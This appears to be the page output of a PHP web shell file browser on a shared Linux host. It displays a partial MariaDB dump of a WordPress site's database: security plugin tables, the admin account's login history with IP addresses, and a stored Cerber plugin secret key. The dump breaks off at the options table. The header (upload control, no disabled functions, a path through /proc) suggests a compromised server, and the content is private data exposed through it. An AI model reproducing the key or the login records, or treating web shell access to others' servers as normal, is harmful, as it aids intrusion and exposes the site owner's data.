HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux ns3133907 6.8.0-84-generic #84-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 5 22:36:38 UTC 2025 x86_64
User: healthinsuranceukorguk (1111)
PHP: 8.2.28
Disabled: NONE
Upload Files
File: //proc/thread-self/root/restore/20230201.bournesocietyorguk.sql
-- MariaDB dump 10.19  Distrib 10.5.18-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: bournesocietyorguk
-- ------------------------------------------------------
-- Server version	10.5.18-MariaDB-1:10.5.18+maria~ubu2004

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `bournesocietyorguk`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `bournesocietyorguk` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci */;

USE `bournesocietyorguk`;

--
-- Table structure for table `cerber_acl`
--

DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
  `ip` varchar(81) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `tag` char(1) NOT NULL,
  `comments` varchar(250) NOT NULL,
  `acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
  `ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
  `v6range` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `req_uri` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_acl`
--

LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_blocks`
--

DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `block_until` bigint(20) unsigned NOT NULL,
  `reason` varchar(250) NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  UNIQUE KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_blocks`
--

LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_countries`
--

DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
  `country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
  `locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
  `country_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`country`,`locale`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_countries`
--

LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab`
--

DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  `stamp` bigint(20) unsigned NOT NULL,
  `details` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab`
--

LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_ip`
--

DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reputation` int(11) unsigned NOT NULL,
  `expires` int(11) unsigned NOT NULL,
  PRIMARY KEY (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_ip`
--

LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_net`
--

DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `expires` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`ip`),
  UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_net`
--

LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_log`
--

DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_login` varchar(60) NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `activity` int(10) unsigned NOT NULL DEFAULT 0,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `details` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `ip` (`ip`),
  KEY `ip_long` (`ip_long`),
  KEY `session_index` (`session_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_log`
--

LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_qmem`
--

DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `stamp` int(10) unsigned NOT NULL,
  KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_qmem`
--

LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_qmem` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_traffic`
--

DROP TABLE IF EXISTS `cerber_traffic`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_traffic` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `hostname` varchar(250) NOT NULL DEFAULT '',
  `uri` text NOT NULL,
  `request_fields` mediumtext NOT NULL,
  `request_details` mediumtext NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `processing` int(10) NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `request_method` char(8) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `wp_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `wp_type` int(10) unsigned NOT NULL DEFAULT 0,
  `is_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `blog_id` int(10) unsigned NOT NULL DEFAULT 0,
  `php_errors` text NOT NULL,
  `req_status` int(10) unsigned NOT NULL DEFAULT 0,
  KEY `stamp` (`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_traffic`
--

LOCK TABLES `cerber_traffic` WRITE;
/*!40000 ALTER TABLE `cerber_traffic` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_events`
--

DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `event_type` varchar(150) NOT NULL DEFAULT '',
  `username` varchar(150) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `ip_or_host` varchar(100) DEFAULT NULL,
  `referer_info` varchar(255) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `country_code` varchar(50) DEFAULT NULL,
  `event_data` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_events`
--

LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_failed_logins`
--

DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_failed_logins`
--

LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_global_meta`
--

DROP TABLE IF EXISTS `wp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `meta_key1` varchar(255) NOT NULL,
  `meta_key2` varchar(255) NOT NULL,
  `meta_key3` varchar(255) NOT NULL,
  `meta_key4` varchar(255) NOT NULL,
  `meta_key5` varchar(255) NOT NULL,
  `meta_value1` varchar(255) NOT NULL,
  `meta_value2` text NOT NULL,
  `meta_value3` text NOT NULL,
  `meta_value4` longtext NOT NULL,
  `meta_value5` longtext NOT NULL,
  PRIMARY KEY (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_global_meta`
--

LOCK TABLES `wp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_activity`
--

DROP TABLE IF EXISTS `wp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_ip` varchar(100) NOT NULL DEFAULT '',
  `login_country` varchar(150) NOT NULL DEFAULT '',
  `browser_type` varchar(150) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_activity`
--

LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_activity` VALUES (1,1,'bournesociety','2017-10-04 09:04:11','0000-00-00 00:00:00','217.206.184.92','',''),(2,1,'bournesociety','2018-05-10 13:45:54','0000-00-00 00:00:00','185.175.113.75','',''),(3,1,'bournesociety','2018-07-26 10:09:00','0000-00-00 00:00:00','185.175.113.75','',''),(4,1,'bournesociety','2018-11-08 15:05:45','0000-00-00 00:00:00','185.175.113.75','',''),(5,1,'bournesociety','2018-11-08 15:09:12','0000-00-00 00:00:00','185.175.113.75','',''),(6,1,'bournesociety','2019-01-14 11:57:35','0000-00-00 00:00:00','185.175.113.75','',''),(7,1,'bournesociety','2020-10-08 10:20:23','0000-00-00 00:00:00','185.175.113.72','',''),(8,1,'bournesociety','2020-10-08 10:20:24','0000-00-00 00:00:00','185.175.113.72','',''),(9,1,'bournesociety','2021-01-25 16:33:05','0000-00-00 00:00:00','37.188.32.3','','');
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_lockdown`
--

DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `failed_login_ip` varchar(100) NOT NULL DEFAULT '',
  `lock_reason` varchar(128) NOT NULL DEFAULT '',
  `unlock_key` varchar(128) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_lockdown`
--

LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_permanent_block`
--

DROP TABLE IF EXISTS `wp_aiowps_permanent_block`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `blocked_ip` varchar(100) NOT NULL DEFAULT '',
  `block_reason` varchar(128) NOT NULL DEFAULT '',
  `country_origin` varchar(50) NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_permanent_block`
--

LOCK TABLES `wp_aiowps_permanent_block` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_permanent_block` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_files`
--

DROP TABLE IF EXISTS `wp_cerber_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_files` (
  `scan_id` int(10) unsigned NOT NULL,
  `scan_type` int(10) unsigned NOT NULL DEFAULT 1,
  `scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_name_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_name` text NOT NULL,
  `file_type` int(10) unsigned NOT NULL DEFAULT 0,
  `file_hash` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_md5` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `file_hash_repo` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `hash_match` int(10) unsigned NOT NULL DEFAULT 0,
  `file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
  `file_perms` int(11) NOT NULL DEFAULT 0,
  `file_writable` int(10) unsigned NOT NULL DEFAULT 0,
  `file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
  `file_ext` varchar(255) NOT NULL DEFAULT '',
  `extra` text NOT NULL,
  PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_files`
--

LOCK TABLES `wp_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_sets`
--

DROP TABLE IF EXISTS `wp_cerber_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_sets` (
  `the_key` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `the_id` bigint(20) NOT NULL DEFAULT 0,
  `the_value` longtext NOT NULL,
  `expires` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_sets`
--

LOCK TABLES `wp_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp_cerber_sets` VALUES ('garbage_collector',0,'1624621051',0),('_background_tasks',0,'a:1:{s:40:\"d5e690918740ad0fcf9adc87b81a1182c28dc8ed\";a:1:{s:4:\"func\";s:23:\"cerber_upgrade_deferred\";}}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"2384daafb625d1949f424bc86ad489ce\";i:1;i:1624621051;i:4;s:40:\"SK//C4VEGL17UBDNP5SAF6WKO2XY8JT9ZQRH0MI3\";}',0);
/*!40000 ALTER TABLE `wp_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_cerber_uss`
--

DROP TABLE IF EXISTS `wp_cerber_uss`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_cerber_uss` (
  `user_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `started` int(10) unsigned NOT NULL,
  `expires` int(10) unsigned NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_cerber_uss`
--

LOCK TABLES `wp_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp_cerber_uss` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_commentmeta`
--

DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_commentmeta`
--

LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_comments`
--

DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_comments`
--

LOCK TABLES `wp_comments` WRITE;
/*!40000 ALTER TABLE `wp_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=InnoDB AUTO_INCREMENT=285800 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
